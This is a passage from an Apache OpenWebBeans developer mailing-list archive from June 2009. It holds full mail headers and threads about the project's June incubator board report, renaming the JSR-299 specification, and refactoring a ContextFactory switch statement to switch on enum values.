riding a bicycle. To keep your balance you > >> must keep moving" > >> - Albert Einstein > >> > > > > > > > > > > > > -- > ---- > Thanks > - Mohammad Nour > - LinkedIn: http://www.linkedin.com/in/mnour > ---- > "Life is like riding a bicycle. To keep your balance you must keep moving" > - Albert Einstein > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --001636d34d541d3bdc046be77342-- From [email protected] Tue Jun 09 12:04:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66033 invoked from network); 9 Jun 2009 12:04:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 12:04:21 -0000 Received: (qmail 53054 invoked by uid 500); 9 Jun 2009 12:04:33 -0000 Delivered-To: [email protected] Received: (qmail 53027 invoked by uid 500); 9 Jun 2009 12:04:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53017 invoked by uid 99); 9 Jun 2009 12:04:33 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 12:04:33 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yw-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 12:04:24 +0000 Received: by yw-out-1718.google.com with SMTP id 5so2325609ywr.0 for <[email protected]>; Tue, 09 Jun 2009 05:04:03 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:mime-version :subject:date:references:x-mailer; bh=p+3K9GFLznZBLbT1Ro0EtRnYFbEqxQy5KNWfaC7HKME=; b=sOMVHIz2FP7qBstyq1qjxJqikOQ4vcRhVQIdIN9HhLlDIt1PMo1B07OJTHUS/M+Z9l IbWA4SM+u9cl5unfrp43HP4i5yRJwqNNpLMJ3fR+WvRvIXvBMDzgeOgentwD3bh3ljXZ 99YPjn+e6i0vMp9HLxNyudVqwE9mH51ExkCLE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:mime-version:subject:date:references :x-mailer; b=FPOgO6YQmZEWm4ee4ixmkFifqtfI1j9WKu2IYh6tXufqSbIqOL7SnKC/NOZ9obCnJ8 uEra10XcpzSBC5ZoUJwDvswfNIi2Gtim1yCpJKy1k1KDFnQ9bKkaMJ3w8aQHxHbEDw+g Klr9kM6Er2mRBfcscV/FbapG36OWnmjpgKBNs= Received: by 161.129.204.104 with SMTP id e4mr13913agc.102.1244549043402; Tue, 09 Jun 2009 05:04:03 -0700 (PDT) Received: from ?161.129.204.104? (cpe-076-182-095-055.nc.res.rr.com [161.129.204.104]) by mx.google.com with ESMTPS id 18sm10461861agb.50.2161.129.204.104.04.01 (version=TLSv1/SSLv3 cipher=RC4-MD5); Tue, 09 Jun 2009 05:04:02 -0700 (PDT) Message-Id: <[email protected]> From: Kevan Miller <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v935.3) Subject: Re: Development Next Steps Date: Tue, 9 Jun 2009 08:04:00 -0400 References: <[email protected]> X-Mailer: Apple Mail (2.935.3) X-Virus-Checked: Checked by ClamAV on apache.org On Jun 8, 2009, at 12:53 PM, Gurkan Erdogdu wrote: > Hi guys; > > As you already know, we have succesfully published our M2 version. > Altough a spec changes a lot from the last draft version, I think we > are on the good track. > > In the mean time I have sent June board report. In this report I > stated one point, from report: > > > NOT : Actually, last draft specification imposes on an implementations > that it must be tightly integrated with a Java EE Container's > internals > , such that integration with an EJB 3.1 Container, Servlet Container, > Managed Beans etc. So, we have to work closely on the respective > Apache > teams to push the implementation. I'd prefer that there was an explicit 'BOARD REPORT' email thread. I have trouble parsing the above. A few things that I think should be mentioned: 1) spec changes have been having a negative impact 2) Gurkan joined the JSR expert group. --kevan From [email protected] Tue Jun 09 14:25:40 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34789 invoked from network); 9 Jun 2009 14:25:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 14:25:40 -0000 Received: (qmail 51975 invoked by uid 500); 9 Jun 2009 14:25:52 -0000 Delivered-To: [email protected] Received: (qmail 51952 invoked by uid 500); 9 Jun 2009 14:25:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51942 invoked by uid 99); 9 Jun 2009 14:25:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 14:25:51 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f220.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 14:25:42 +0000 Received: by fxm20 with SMTP id 20so10047fxm.12 for <[email protected]>; Tue, 09 Jun 2009 07:25:22 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=q9HjgerjDLoppsfJOhll/+k3X4qZwBNMPKIwRh3sVpg=; b=X6ExEioivoWeJD3Pns0NFHFLQFo961/lf6yTe9MsZ5DcYv91hLhvGRSyDMTp5tb8VC XQRPjPiYMj8feReRzP0x1BqJir6C22o72IbYlGlg0+0PURoRC9UNiJ4YO2UdDABfFd71 LfaB3tHOWS4tucTcaPHYS/+4vlH7iDUVcNSL8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=BVw+6I6lOMfvuA6MFitVJrKAZv3K5x0nhRl4Bmzls325UzzICuBDToFZW+YN3jV5DQ JdOP79aUzT0g8l1RAEi+xWQVfJAwoE2qhU0jGLRGtmOKqYSLzJ3yKMIDC/keRoxirzH3 rwoQSNZkfw9rS1hvykQ1uTq0XD1svIbXZBdQQ= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id a13mr163095bko.89.1244557522134; Tue, 09 Jun 2009 07:25:22 -0700 (PDT) Date: Tue, 9 Jun 2009 17:25:22 +0300 Message-ID: <[email protected]> Subject: [BOARD REPORT] OWB June Report From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e6dd8d7e0265f7046beb21ae X-Virus-Checked: Checked by ClamAV on apache.org --0016e6dd8d7e0265f7046beb21ae Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hi guys; I have created a June board report at http://wiki.apache.org/incubator/June2009. I will also update its content with Kevan comments that are 1) spec changes have been having a negative impact 2) Gurkan joined the JSR expert group.) --Gurkan June Report Content: OpenWebBeans > > OpenWebBeans will be an ASL-licensed implementation of the Web Beans > Specification which is defined as JSR-299. > > OpenWebBeans entered the incubator in October 26, 2008. The following items > have been made after the last report > > - > > We released the M2 version > - > > We created additional documentation in the wiki page > - > > We implemented full blown JSF + JPA + OWB application that shows usage > of the OpenWebBeans <http://wiki.apache.org/incubator/OpenWebBeans> > > Belows are the next steps; > > - > > We will release the M3 version. > - > > We will create more documentation in the wiki > - > > We will continue to attract new committers into the project. > > NOT : Actually, last draft specification imposes on an implementations > that it must be tightly integrated with a Java EE Container's internals , > such that integration with an EJB 3.1 Container, Servlet Container, Managed > Beans etc. So, we have to work closely on the respective Apache teams to > push the implementation. > > > --0016e6dd8d7e0265f7046beb21ae-- From [email protected] Tue Jun 09 14:51:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46242 invoked from network); 9 Jun 2009 14:51:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 14:51:32 -0000 Received: (qmail 98731 invoked by uid 500); 9 Jun 2009 14:51:43 -0000 Delivered-To: [email protected] Received: (qmail 98717 invoked by uid 500); 9 Jun 2009 14:51:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98698 invoked by uid 99); 9 Jun 2009 14:51:43 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 14:51:43 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f220.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 14:51:32 +0000 Received: by fxm20 with SMTP id 20so33969fxm.12 for <[email protected]>; Tue, 09 Jun 2009 07:51:10 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=Wzw18rvy6HEIopItSeQvxvBaaSwQTZUV93Q0yyfBtZ0=; b=eNKvk/Vlw/tOiqPhrOSNbuIkaExyL0+jtQotOn2eDheY0XUsU0cPQSO7ZGfiKsQF03 4wKw0FiNHwVnDCOVKsPIuW4nQv+rzKrr0ncM/1YbQashTbIsqq+l+uTLiyQ6s8dnZoMK zY3mOAobxyEnRPnRHHYtEUgUEid0CWonBqguM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=v/bdIqgCspMI3PAvcUUN2/fdguGi1KdE7ORRXxJMyhwL3gLpF3EXm/J6ElvwoOouC9 KT8YDhUHP2+X0VoWCwFKhdTzn4BiBp2kwGYw5fQabfBvWVKqEQnOBEofh/bqjNNu7mvH +DZ3Vmmv3Nrg91ZYfOSaI6aZbX+iaMTvYPmC0= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id b5mr186131fas.34.1244559070094; Tue, 09 Jun 2009 07:51:10 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 9 Jun 2009 17:51:09 +0300 Message-ID: <[email protected]> Subject: Re: [BOARD REPORT] OWB June Report From: Mohammad Nour El-Din <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org In the Report u said: "OpenWebBeans will be an ASL-licensed implementation of the Web Beans Specification which is defined as JSR-299.", I think we should change the "Web Beans Specification" to "Contexts and Dependency Injection for Java EE". I will make this modification to the report. On Tue, Jun 9, 2009 at 5:25 PM, Gurkan Erdogdu<[email protected]> wr= ote: > Hi guys; > > I have created a June board report at > http://wiki.apache.org/incubator/June2009. > > I will also update its content with Kevan comments that are 1) spec chang= es > have been having a negative impact > 2) Gurkan joined the JSR expert group.) > > --Gurkan > > June Report Content: > > OpenWebBeans >> >> OpenWebBeans will be an ASL-licensed implementation of the Web Beans >> Specification which is defined as JSR-299. >> >> OpenWebBeans entered the incubator in October 26, 2008. The following it= ems >> have been made after the last report >> >> =A0 =A0- >> >> =A0 =A0We released the M2 version >> =A0 =A0- >> >> =A0 =A0We created additional documentation in the wiki page >> =A0 =A0- >> >> =A0 =A0We implemented full blown JSF + JPA + OWB application that shows = usage >> =A0 =A0of the OpenWebBeans <http://wiki.apache.org/incubator/OpenWebBean= s> >> >> =A0Belows are the next steps; > >> >> =A0 =A0- >> >> =A0 =A0We will release the M3 version. >> =A0 =A0- >> >> =A0 =A0We will create more documentation in the wiki >> =A0 =A0- >> >> =A0 =A0We will continue to attract new committers into the project. >> >> =A0 =A0NOT : Actually, last draft specification imposes on an implementa= tions >> =A0 =A0that it must be tightly integrated with a Java EE Container's int= ernals , >> =A0 =A0such that integration with an EJB 3.1 Container, Servlet Containe= r, Managed >> =A0 =A0Beans etc. So, we have to work closely on the respective Apache t= eams to >> =A0 =A0push the implementation. >> >> >> > --=20 ---- Thanks - Mohammad Nour - LinkedIn: http://www.linkedin.com/in/mnour ---- "Life is like riding a bicycle. To keep your balance you must keep moving" - Albert Einstein From [email protected] Tue Jun 09 14:57:02 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48327 invoked from network); 9 Jun 2009 14:57:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 14:57:00 -0000 Received: (qmail 15959 invoked by uid 500); 9 Jun 2009 14:57:11 -0000 Delivered-To: [email protected] Received: (qmail 15940 invoked by uid 500); 9 Jun 2009 14:57:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15930 invoked by uid 99); 9 Jun 2009 14:57:11 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 14:57:11 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f220.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 14:56:59 +0000 Received: by fxm20 with SMTP id 20so39072fxm.12 for <[email protected]>; Tue, 09 Jun 2009 07:56:39 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=ASvwa0kZquc9NigetWPKIqVEKjA0x2oXucMXa4Ga6s0=; b=YTzNqAdk17c72DMTQnIUqEJx93VPsYDDcNVKlrlWTDedOK7GODjzBwNHaSKLDAgvBJ PnzKkBMvYPNd+kOh7M/5uVaOhTCDJ4jTiMzKX6/2kfxZf6mIsD6yCUmnsELD8irAyen9 v16Zd7msA2COgObJHR0Z6LPI9dzlBcHqCeOlQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=jZ4Ji+bOjwsBk24cu923m6/3ByaCmz/hDWivLN9HgMD8lhA4ITPtYmBUgoGwENjPFY ukZ+puwf8pdflTkU17OKxduYVYJBYPSmVrfqC3BtzQ/jxaK9FYcXkTDjQqnfSAq4XPOI m1NtT/VK4ENHCwGTe0wPJ3B2Fy1G0Eg5hrvfM= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id d11mr199440fas.22.1244559399280; Tue, 09 Jun 2009 07:56:39 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Tue, 9 Jun 2009 17:56:39 +0300 Message-ID: <[email protected]> Subject: Re: [BOARD REPORT] OWB June Report From: Mohammad Nour El-Din <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Done On Tue, Jun 9, 2009 at 5:51 PM, Mohammad Nour El-Din<[email protected]> wrote: > In the Report u said: > > =A0"OpenWebBeans will be an ASL-licensed implementation of the Web > Beans Specification which is defined as JSR-299.", I think we should > change the "Web Beans Specification" to "Contexts and Dependency > Injection for Java EE". =A0I will make this modification to the report. > > On Tue, Jun 9, 2009 at 5:25 PM, Gurkan Erdogdu<[email protected]> = wrote: >> Hi guys; >> >> I have created a June board report at >> http://wiki.apache.org/incubator/June2009. >> >> I will also update its content with Kevan comments that are 1) spec chan= ges >> have been having a negative impact >> 2) Gurkan joined the JSR expert group.) >> >> --Gurkan >> >> June Report Content: >> >> OpenWebBeans >>> >>> OpenWebBeans will be an ASL-licensed implementation of the Web Beans >>> Specification which is defined as JSR-299. >>> >>> OpenWebBeans entered the incubator in October 26, 2008. The following i= tems >>> have been made after the last report >>> >>> =A0 =A0- >>> >>> =A0 =A0We released the M2 version >>> =A0 =A0- >>> >>> =A0 =A0We created additional documentation in the wiki page >>> =A0 =A0- >>> >>> =A0 =A0We implemented full blown JSF + JPA + OWB application that shows= usage >>> =A0 =A0of the OpenWebBeans <http://wiki.apache.org/incubator/OpenWebBea= ns> >>> >>> =A0Belows are the next steps; >> >>> >>> =A0 =A0- >>> >>> =A0 =A0We will release the M3 version. >>> =A0 =A0- >>> >>> =A0 =A0We will create more documentation in the wiki >>> =A0 =A0- >>> >>> =A0 =A0We will continue to attract new committers into the project. >>> >>> =A0 =A0NOT : Actually, last draft specification imposes on an implement= ations >>> =A0 =A0that it must be tightly integrated with a Java EE Container's in= ternals , >>> =A0 =A0such that integration with an EJB 3.1 Container, Servlet Contain= er, Managed >>> =A0 =A0Beans etc. So, we have to work closely on the respective Apache = teams to >>> =A0 =A0push the implementation. >>> >>> >>> >> > > > > -- > ---- > Thanks > - Mohammad Nour > - LinkedIn: http://www.linkedin.com/in/mnour > ---- > "Life is like riding a bicycle. To keep your balance you must keep moving= " > - Albert Einstein > --=20 ---- Thanks - Mohammad Nour - LinkedIn: http://www.linkedin.com/in/mnour ---- "Life is like riding a bicycle. To keep your balance you must keep moving" - Albert Einstein From [email protected] Tue Jun 09 17:34:04 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27476 invoked from network); 9 Jun 2009 17:34:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 17:34:04 -0000 Received: (qmail 7373 invoked by uid 500); 9 Jun 2009 17:34:16 -0000 Delivered-To: [email protected] Received: (qmail 7352 invoked by uid 500); 9 Jun 2009 17:34:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7342 invoked by uid 99); 9 Jun 2009 17:34:15 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 17:34:15 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web38207.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 09 Jun 2009 17:34:04 +0000 Received: (qmail 62892 invoked by uid 60001); 9 Jun 2009 17:33:43 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1244568823; bh=vVB55qxZD2U2PykpNoFr6eFofvxKpOY1zpvFr2VSgIU=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=rHNckvCLTDnHwXnaCbscUodvR6L57lG8AvKeqnLtTFghX9NtHruAZpOZrkSLTd1V17n51qRWGsfB8XkVRg/XgfPmaYdfJaGoKM4XqcfAaE0O+HZ7mAS5QzFLpfYzXZjSx4Ee40oQTDAgFjBuoIBSrqBP6dJbV60NhUwGS2eC3xw= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=CUeUX1UvSg13C5Sp4yD4BtuQ4EiosjZSwU0Wm3/1Tuq/V5OgB/IJvb7ixbDj/RYJ5OXiKMRl9FYDLEIAxWLXtsbTdRrnDZ5uoDv+/jBpNxv+Or69pjTsCGwruC/+Kazr9W5W4n7wrvOR4KCcwW0eNuvIZFV/bm1vlNtDsBbLPQ8=; Message-ID: <[email protected]> X-YMail-OSG: mtcE_RoVM1mORH2A1gfK3NGWmc3pbpZuIktyTY_lSjzJE1k_ucRyHJcozmOouFGkD4qOwIqkWLnW16yGa2_ZP7BKHNAk.kt0AVFYQbZ5VlHPpel8CSje1ar8u7MKvPI6gzo_KT3zJBPzMqGbJSoDl.V4.MGf58w4xCWooqDWYu.5PD0SfodXnSZXqXY7RJqouyO1OQbFLHEdSBAmAb9BLZ6qC2s0e7iFS_JGDl5.Xt8EyPvwNJdGQYcCtIuiBhVKBPLezIFv7OZB47aqkplaeKC_oNai1Q85GADgMuWwmzaliA08liYaYumEmy80TDkGyGf0DFsICtbuM.0p5kl4yXMsnOrp4lBOU0zgnSFT Received: from [161.129.204.104] by web38207.mail.mud.yahoo.com via HTTP; Tue, 09 Jun 2009 10:33:42 PDT X-Mailer: YahooMailRC/1277.43 YahooMailWebService/0.7.289.15 References: <[email protected]> <[email protected]> <[email protected]> Date: Tue, 9 Jun 2009 10:33:42 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Re: [BOARD REPORT] OWB June Report To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-528385559-1244568822=:61953" X-Virus-Checked: Checked by ClamAV on apache.org --0-528385559-1244568822=:61953 Content-Type: text/plain; charset=us-ascii Ok, thanks. --Gurkan ________________________________ From: Mohammad Nour El-Din <[email protected]> To: [email protected] Sent: Tuesday, June 9, 2009 5:56:39 PM Subject: Re: [BOARD REPORT] OWB June Report Done On Tue, Jun 9, 2009 at 5:51 PM, Mohammad Nour El-Din<[email protected]> wrote: > In the Report u said: > > "OpenWebBeans will be an ASL-licensed implementation of the Web > Beans Specification which is defined as JSR-299.", I think we should > change the "Web Beans Specification" to "Contexts and Dependency > Injection for Java EE". I will make this modification to the report. > > On Tue, Jun 9, 2009 at 5:25 PM, Gurkan Erdogdu<[email protected]> wrote: >> Hi guys; >> >> I have created a June board report at >> http://wiki.apache.org/incubator/June2009. >> >> I will also update its content with Kevan comments that are 1) spec changes >> have been having a negative impact >> 2) Gurkan joined the JSR expert group.) >> >> --Gurkan >> >> June Report Content: >> >> OpenWebBeans >>> >>> OpenWebBeans will be an ASL-licensed implementation of the Web Beans >>> Specification which is defined as JSR-299. >>> >>> OpenWebBeans entered the incubator in October 26, 2008. The following items >>> have been made after the last report >>> >>> - >>> >>> We released the M2 version >>> - >>> >>> We created additional documentation in the wiki page >>> - >>> >>> We implemented full blown JSF + JPA + OWB application that shows usage >>> of the OpenWebBeans <http://wiki.apache.org/incubator/OpenWebBeans> >>> >>> Belows are the next steps; >> >>> >>> - >>> >>> We will release the M3 version. >>> - >>> >>> We will create more documentation in the wiki >>> - >>> >>> We will continue to attract new committers into the project. >>> >>> NOT : Actually, last draft specification imposes on an implementations >>> that it must be tightly integrated with a Java EE Container's internals , >>> such that integration with an EJB 3.1 Container, Servlet Container, Managed >>> Beans etc. So, we have to work closely on the respective Apache teams to >>> push the implementation. >>> >>> >>> >> > > > > -- > ---- > Thanks > - Mohammad Nour > - LinkedIn: http://www.linkedin.com/in/mnour > ---- > "Life is like riding a bicycle. To keep your balance you must keep moving" > - Albert Einstein > -- ---- Thanks - Mohammad Nour - LinkedIn: http://www.linkedin.com/in/mnour ---- "Life is like riding a bicycle. To keep your balance you must keep moving" - Albert Einstein --0-528385559-1244568822=:61953-- From [email protected] Tue Jun 16 01:58:50 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18146 invoked from network); 16 Jun 2009 01:58:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2009 01:58:50 -0000 Received: (qmail 55093 invoked by uid 500); 16 Jun 2009 01:59:00 -0000 Delivered-To: [email protected] Received: (qmail 55068 invoked by uid 500); 16 Jun 2009 01:59:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55058 invoked by uid 99); 16 Jun 2009 01:59:00 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Jun 2009 01:59:00 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO qw-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Jun 2009 01:58:51 +0000 Received: by qw-out-1920.google.com with SMTP id 9so2335068qwj.54 for <[email protected]>; Mon, 15 Jun 2009 18:58:30 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id s3mr38753qcl.8.1245117510157; Mon, 15 Jun 2009 18:58:30 -0700 (PDT) From: James Carman <[email protected]> Date: Mon, 15 Jun 2009 21:58:10 -0400 Message-ID: <[email protected]> Subject: ContextFactory switch statements... To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org In the code for org.apache.webbeans.context.ContextFactory, we currently have: switch (type.getName()) { case 0: context = getRequestContext(); break; case 1: context = getSessionContext(); break; case 2: context = getApplicationContext(); break; case 3: context = getConversationContext(); break; case 4: context = getDependentContext(); break; default: throw new IllegalArgumentException("There is no such a standard context with name id=" + type.getName()); } This should be changed to (the Java language supports switching on enum values): switch (type) { case REQUEST: context = getRequestContext(); break; case SESSION: context = getSessionContext(); break; case APPLICATION: context = getApplicationContext(); break; case CONVERSATION: context = getConversationContext(); break; case DEPENDENT: context = getDependentContext(); break; default: throw new IllegalArgumentException("There is no such a standard context with name id=" + type.getName()); } This is much more readable. From [email protected] Tue Jun 16 05:25:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89256 invoked from network); 16 Jun 2009 05:25:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2009 05:25:19 -0000 Received: (qmail 19112 invoked by uid 500); 16 Jun 2009 05:25:30 -0000 Delivered-To: [email protected] Received: (qmail 19084 invoked by uid 500); 16 Jun 2009 05:25:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19073 invoked by uid 99); 16 Jun 2009 05:25:30 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Jun 2009 05:25:30 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web38202.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 16 Jun 2009 05:25:19 +0000 Received: (qmail 47775 invoked by uid 60001); 16 Jun 2009 05:24:58 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1245129898; bh=zG2lxnqqxl7eHcPl21R7jf603oCrXbR9VwvWhCVFSgo=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=qdax/JBaWBS+hzC8WYOOJk+ByQp8vNALFc+VtPC4MJZRNvVFaGN9gPHDa8sY0WXPWveTiPuSg7VpJktqRKUTkSbtNrdThZs/vTN3S2xJ13Bb7L05VcbY1AJK0XR1H+tB8d1zIrW28fwdYhUpILxvBy3zFmyA2ERLSLMAQBkYJAE= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; 